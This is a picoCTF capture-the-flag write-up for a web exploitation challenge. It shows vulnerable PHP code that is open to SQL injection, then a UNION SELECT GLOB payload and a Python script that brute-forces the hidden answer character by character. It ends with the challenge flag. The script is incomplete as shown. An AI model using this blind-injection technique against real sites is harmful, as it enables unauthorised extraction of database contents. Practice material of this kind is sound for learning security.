Points: 650
Web Exploitation
There is a website running at http://2018shell1.picoctf.com:2644 (link). Try to see if you can answer its question.
No Hints.
Looking at the source code, we can see that this web application is vulnerable to SQL injections.
include "config.php";
ini_set('error_reporting', E_ALL);
ini_set('display_errors', 'On');
$answer = $_POST["answer"];
$debug = $_POST["debug"];
$query = "SELECT * FROM answers WHERE answer='$answer'";
echo "<pre>";
echo "SQL query: ", htmlspecialchars($query), "\n";
echo "</pre>";However, it doesn't appear to print anything out, but just tells you either you're wrong, you're close, or you get the flag
$con = new SQLite3($database_file);
$result = $con->query($query);
$row = $result->fetchArray();
if($answer == $CANARY) {
echo "<h1>Perfect!</h1>";
echo "<p>Your flag is: $FLAG</p>";
}
elseif ($row) {
echo "<h1>You are so close.</h1>";
} else {
echo "<h1>Wrong.</h1>";
}Alright, let's create a small injection to slowly brute-force the answer.
' UNION SELECT * FROM answers WHERE answer GLOB '<input>*'; --
We use GLOB instead of LIKE because it's case-sensitive. Also we use * or % because GLOB uses Unix wildcards.
We run the script and get the flag.
final = ''
while True:
for i in range(0x20, 0x7f):
if i != 42 and i != 63: # Removes Unix wildcards '*' and '?'
params = {
'answer': "' UNION SELECT * FROM answers WHERE answer GLOB '{}{}*'; --".format(final, chr(i))
}
r = requests.post('http://2018shell1.picoctf.com:2644/answer2.php', data=params)
res = r.text
print resWorking solution solve.py
picoCTF{qu3stions_ar3_h4rd_28fc1206}